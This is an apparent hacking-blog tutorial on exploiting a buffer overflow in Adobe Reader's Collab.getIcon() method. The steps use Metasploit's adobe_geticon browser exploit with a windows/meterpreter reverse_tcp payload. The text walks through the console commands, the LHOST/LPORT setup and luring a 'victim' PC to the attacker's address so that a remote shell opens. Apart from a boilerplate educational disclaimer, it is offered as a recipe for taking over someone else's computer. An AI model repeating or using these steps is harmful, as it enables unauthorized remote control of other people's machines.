Hack Remote PC with Adobe Collab.getIcon() Buffer Overflow


This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a malicious web site or open a malicious file.

The specific flaw exists when processing malicious JavaScript contained in a PDF document. When supplying a specially crafted argument to the getIcon() method of a Collab object, proper bounds checking is not performed resulting in a stack overflow. If successfully exploited full control of the affected machine running under the credentials of the currently logged in user can be achieved.



Lets Start with Adobe Collab.getIcon() Buffer Overflow


Step 1. Open MetaSploit with msfconsole command


Hack Remote PC with Adobe Collab.getIcon() Buffer Overflow


Step 2. Now Search adobe_geticon.


Hack Remote PC with Adobe Collab.getIcon() Buffer Overflow


Step 3. Use Below Commands :-

use exploit/windows/browser/adobe_geticon

set payload windows/meterpreter/reverse_tcp

options


Hack Remote PC with Adobe Collab.getIcon() Buffer Overflow


Step 4. Next, we need to set the LHOST and LPORT exactly like we did with the Linux web delivery exploit. And type run.


Hack Remote PC with Adobe Collab.getIcon() Buffer Overflow


Step 5.Open the Kali Linux ip on victim PC (Window PC/target PC) in browser.


Hack Remote PC with Adobe Collab.getIcon() Buffer Overflow


Step 6.When you run the file on victim PC ,they will be Hacked by you on Kali Linux(Sessions will come on terminal)

A meterpreter session open!


Hack Remote PC with Adobe Collab.getIcon() Buffer Overflow


I hope you enjoyed this article.



Sharing is caring

google
linkedin

About Author

Akash is a co-founder and an aspiring entrepreneur who keeps a close eye on open source, tech giants, and security. Get in touch with him by sending an email (akashchugh1994@gmail.com).


You may also like :-




Leave a Comment

Your email address will not be published. Required fields are marked *




Stay Connected

Popular Posts

Get Latest Stuff Through Email


Who Should Read TechTrick?

All the tricks and tips that TechTrick provides only for educational purpose. If you choose to use the information in TechTrick to break into computer systems maliciously and without authorization, you are on your own. Neither I (TechTrick Admin) nor anyone else associated with TechTrick shall be liable. We are not responsibe for any issues that caused due to informations provided here. So, Try yourself and see the results. You are not losing anything by trying... We are humans, Mistakes are quite natural. Here on TechTrick also have many mistakes..